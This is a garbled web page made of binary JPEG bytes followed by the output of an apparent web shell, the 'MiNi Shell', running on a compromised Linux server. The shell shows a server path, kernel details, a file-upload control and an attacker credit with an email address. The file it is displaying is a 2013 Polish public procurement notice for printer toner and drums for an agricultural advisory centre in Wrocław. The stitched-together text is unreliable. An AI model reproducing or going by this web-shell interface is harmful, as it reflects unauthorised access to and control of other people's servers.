JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130201/45448-N-2013.html

<p class="kh_header"><b>Wrocław: Dostawa materiałów eksploatacyjnych do drukarek, kserokopiarek i urządzeń wielofunkcyjnych na rzecz Dolnośląskiego Ośrodka Doradztwa Rolniczego 
we Wrocławiu</b><br>
<b>Numer ogłoszenia: 45448 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląski Ośrodek Doradztwa Rolniczego , ul. Zwycięska 8, 53-033 Wrocław, woj. dolnośląskie, tel. 71 3398656, faks 71 3397912.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dodr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek, kserokopiarek i urządzeń wielofunkcyjnych na rzecz Dolnośląskiego Ośrodka Doradztwa Rolniczego 
we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do drukarek, kserokopiarek i urządzeń wielofunkcyjnych na rzecz Dolnośląskiego Ośrodka Doradztwa Rolniczego we Wrocławiu w okresie od dnia podpisania umowy do dnia 01.08.2013 r., określonych w poniższej specyfikacji: 1) Toner do drukarki Samsung ML-4510ND, o wydajności nie mniejszej niż 15000 stron, typu MLT-D307L (2 szt.), 2) Bęben do drukarki Samsung ML-4510ND, o wydajności  nie mniej niż  60000 stron, typu MLT-R307 (1 szt.), 3) Toner do urządzenia wielofunkcyjnego Samsung CLX-6260FD black, o wydajności nie mniejszej niż 6000 stron,  typu CLT-K506L (4 szt.), 4) Toner do urządzenia wielofunkcyjnego Samsung CLX-6260FD cyan, o wydajności nie mniejszej niż 3500 stron,  typu CLT-C506L (6 szt.), 5) Toner do urządzenia wielofunkcyjnego Samsung CLX-6260FD magenta, o wydajności nie mniejszej niż 3500 stron,  typu CLT-M506L (6 szt.), 6) Toner do urządzenia wielofunkcyjnego Samsung CLX-6260FD yellow, o wydajności nie mniejszej niż 3500 stron, typu CLT-Y506L (6 szt.), 7) Pojemnik na zużyty toner do urządzenia wielofunkcyjnego Samsung CLX-6260FD, typu CLT-W506 (4 szt.), 8) Toner do urządzenia wielofunkcyjnego Samsung SCX-5637FR black, o wydajności nie mniejszej niż 10000 stron,  typu MLT-D205E (16 szt.), 9) Toner do drukarki Develop ineo +35P black, o wydajności nie mniejszej niż 6000 stron, typu TNP-22K (6 szt.), 10) Toner do drukarki Develop ineo +35P cyan, o wydajności nie mniejszej niż 6000 stron, typu TNP-22C (6 szt.), 11) Toner do drukarki Develop ineo +35P magenta, o wydajności nie mniejszej niż 6000 stron, typu TNP-22M (6 szt.), 12) Toner do drukarki Develop ineo +35P yellow, o wydajności nie mniejszej niż 6000 stron, typu TNP-22Y (6 szt.), 13) Bęben do drukarki Develop ineo +35P black, o wydajności nie mniejszej niż 30000 stron, typu IUP-14K (3 szt.), 14) Bęben do drukarki Develop ineo +35P cyan, o wydajności nie mniejszej niż 30000 stron, typu IUP-14C (3 szt.), 15) Bęben do drukarki Develop ineo +35P magenta, o wydajności nie mniejszej niż 30000 stron, typu IUP-14M (3 szt.), 16) Bęben do drukarki Develop ineo +35P yellow, o wydajności nie mniejszej niż 30000 stron, typu IUP-14Y (3 szt.), 17) Toner do kserokopiarki Develop ineo 223, o wydajności nie mniejszej niż 17500 stron, typu TN-217 (4 szt.), 18) Toner do urządzenia wielofunkcyjnego Develop ineo +454 black, o wydajności nie mniejszej niż 26000 typu, TN512K (3 szt.), 19)Toner do urządzenia wielofunkcyjnego Develop ineo +454 cyan, o wydajności nie mniejszej niż 35000, typu TN512C (2 szt.), 20) Toner do urządzenia wielofunkcyjnego Develop ineo +454 magenta, o wydajności nie mniejszej niż 35000, typu TN512M (2 szt.), 21) Toner do urządzenia wielofunkcyjnego Develop ineo +454 yellow, o wydajności nie mniejszej niż 35000, typu TN512Y (2 szt.)
2. Przez dostawę należy rozumieć sukcesywne dostawy materiałów eksploatacyjnych na podstawie zamówień jednostkowych dostosowanych do potrzeb Zamawiającego, składanych przez upoważniona osobę - na warunkach wskazanych we wzorze umowy stanowiącym Załącznik nr 6 do SIWZ oraz z cechami podanymi w formularzu ofertowym stanowiącym Załącznik nr 1 do SIWZ i zestawieniu kosztów zamówienia stanowiącym Załącznik nr 2 do SIWZ. 3. Zamawiający wymaga aby materiały eksploatacyjne były fabrycznie nowe, kompletne, nieużywane, wolne od wad fizycznych i prawnych, wyprodukowane przez producentów urządzeń wskazanych powyżej oraz w Załączniku nr 2 do SIWZ lub równoważne. 4. Zamawiający wymaga aby materiały eksploatacyjne dostarczane były w terminie do trzech dni roboczych od dnia złożenia zamówienia faksem lub pocztą elektroniczną. 5. Wskazane powyżej oraz w Załączniku nr 2 do SIWZ nazwy własne należy przyjąć jako określające parametry techniczne, eksploatacyjne i użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty na materiały o równoważnych lub lepszych parametrach technicznych, eksploatacyjnych i użytkowych (pojemność bębna/tonera, wydajność, jakość wydruku). Ciężar udowodnienia, że oferowane materiały eksploatacyjne są równoważne w stosunku do wymagań określonych w SIWZ spoczywa na Wykonawcy w myśl art. 30 ust. 5 Ustawy. 6. Za równoważne Zamawiający uznaje materiały eksploatacyjne nieregenerowane, niepoddane procesowi ponownego napełniania ani wymiany jakichkolwiek elementów, kompatybilne z urządzeniami, w których będą wykorzystywane i niepowodujące uszkodzeń ani awarii w pracy urządzeń, do których są przeznaczone. 7. Materiały równoważne muszą mieć wydajność co najmniej taką, jaka została podana powyżej oraz Załączniku nr 2 do SIWZ. Materiały równoważne muszą działać analogicznie, jak produkty oryginalne producenta urządzeń dające prawidłowe komunikaty. 8. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca do składanej oferty zobowiązany jest dołączyć kserokopie kart katalogowych lub wydruki ze stron internetowych producentów materiałów eksploatacyjnych zawierające specyfikację techniczną danego materiału eksploatacyjnego, ze szczególnym uwzględnieniem potwierdzenia ilości drukowanych stron (wydajności) - dokumenty te dotyczą zarówno materiałów eksploatacyjnych wyprodukowanych przez producentów urządzeń określonych w opisie przedmiotu zamówienia, jak i dla materiałów równoważnych. 9. W przypadku gdy Wykonawca oferuje materiały równoważne, Zamawiający ma prawo żądać od Wykonawcy zwrotu kosztów naprawy urządzeń, wymiany urządzeń na nowe lub przejęcia przez Wykonawcę gwarancji producenta urządzenia - w przypadku gdy bezpośrednią przyczyną awarii urządzeń będzie zastosowanie dostarczonych materiałów eksploatacyjnych. 10. W przypadku stwierdzenia przez Zamawiającego w trakcie trwania umowy, że wydajność, jakość lub niezawodność dostarczonych materiałów eksploatacyjnych odbiega od parametrów produktu oryginalnego - pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony - lub materiał nie sygnalizuje we właściwy sposób stanu zużycia, Zamawiający jest uprawniony do żądania wymiany materiału eksploatacyjnego na materiał spełniający wymagania Zamawiającego, a Wykonawca zobowiązany jest do jego wymiany (np. na materiał pochodzący od producenta urządzenia) w terminie do trzech dni roboczych od dnia zgłoszenia takie żądania. W takim przypadku ceny zaoferowane przez Wykonawcę w  zestawieniu kosztów zamówienia pozostają bez zmian. 11. Dostarczane materiały eksploatacyjne będą posiadały znak firmowy producenta, etykiety zawierające numer katalogowy, nienaruszone cechy opakowania pierwotnego. 12. Wykonawca ponosi koszty transportu, ubezpieczenia oraz opakowania materiałów na czas trwania transportu do miejsca dostarczenia. 13. Wykonawca w ramach umowy ma obowiązek utylizacji zużytych pojemników zgodnie z ustawą o odpadach z dnia 27.04.2010 r. (Dz. U. z 2010 r. Nr 185, poz. 1243, z późn. zm.) - Wykonawca zobowiązany jest odbierać zużyte pojemniki z siedziby Zamawiającego w terminie uzgodnionym z Zamawiającym. Wykonawca każdorazowo będzie przedkładał Zamawiającemu dokument potwierdzający utylizację przekazanych przez Zamawiającego zużytych materiałów eksploatacyjnych. 14. Zamawiający zastrzega, że podane ilości stanowią wielkość szacunkową i służą do porównania ofert i wyboru najkorzystniejszej oferty. Zamawiający nie jest zobowiązany do zamówienia materiałów eksploatacyjnych w podanych ilościach. Sytuacja ta nie może być podstawą do roszczenia Wykonawcy o zakup nie zrealizowanej części umowy. 15. Ilość przedmiotu zamówienia może ulec zmianie w poszczególnych rodzajach stosownie do potrzeb Zamawiającego. 16. Warunki gwarancji: 1)okres gwarancji na dostarczone materiały eksploatacyjne wynosić musi co najmniej 12 miesięcy od daty ich odbioru bez uwag i zastrzeżeń przez Zamawiającego; 2) w przypadku ujawnienia w okresie gwarancji wad materiałów Wykonawca zobowiązany będzie do bezpłatnej ich wymiany na nowe, wolne od wad i dostarczenia na własny koszt w terminie do trzech dni roboczych od dnia zgłoszenia przez Zamawiającego tego faktu faksem, pisemnie lub poczta elektroniczną; 3) w przypadku wymiany materiałów eksploatacyjnych na nowe, wolne od wad, okres gwarancji biegnie na nowo od daty ich odbioru.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.21.12.43-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w przedmiotowym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniony warunek posiadania uprawnień do wykonywania określonej działalności lub czynności na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniony warunek posiadania wiedzy i doświadczenia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz dokumentów przedłożonych przez Wykonawcę, których treść potwierdzać będzie, że Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie lub wykonuje należycie co najmniej trzy dostawy materiałów eksploatacyjnych do drukarek, kserokopiarek i urządzeń wielofunkcyjnych (tonery), o łącznej wartości każdej z tych dostaw nie mniejszej niż 30 000,00 złotych brutto i trwającej nie krócej niż 6 miesięcy każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniony warunek dysponowania potencjałem technicznym na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniony warunek dysponowania osobami zdolnymi do wykonania zamówienia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniony warunek dotyczący sytuacji ekonomicznej i finansowej na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca do składanej oferty zobowiązany jest dołączyć kserokopie kart katalogowych lub wydruki ze stron internetowych producentów materiałów eksploatacyjnych zawierające specyfikację techniczną danego materiału eksploatacyjnego, ze szczególnym uwzględnieniem potwierdzenia ilości drukowanych stron (wydajności) - dokumenty te dotyczą zarówno materiałów eksploatacyjnych wyprodukowanych przez producentów urządzeń określonych w opisie przedmiotu zamówienia, jak i dla materiałów równoważnych.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 Ustawy, Zamawiający informuje, że przewiduje możliwość istotnych zmian postanowień zawartej umowy w przypadku określonym w § 4 ust. 7 wzoru umowy, tj. zmian cen spowodowanych zmianami przepisów określających wysokość należnego podatku VAT, na podstawie obowiązujących przepisów prawa w tym zakresie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dodr.ibip.wroc.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Ośrodek Doradztwa Rolniczego we Wrocławiu, ul. Zwycięska 8, 53-033 Wrocław (bud. B-3, pok. nr 23).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2013 godzina 09:00, miejsce: Dolnośląski Ośrodek Doradztwa Rolniczego we Wrocławiu, ul. Zwycięska 8, 53-033
Wrocław (bud. B-4, pok. nr 3 - sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dolnośląski Ośrodek Doradztwa Rolniczego we Wrocławiu działający na podstawie ustawy z dnia 22 października 2004 r. o jednostkach doradztwa rolniczego (Dz. U. z 2004 r. Nr 251, poz. 2507, ze zm.) ul. Zwycięska 8, 53-033 Wrocław, NIP 8961000264, REGON 006011298.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com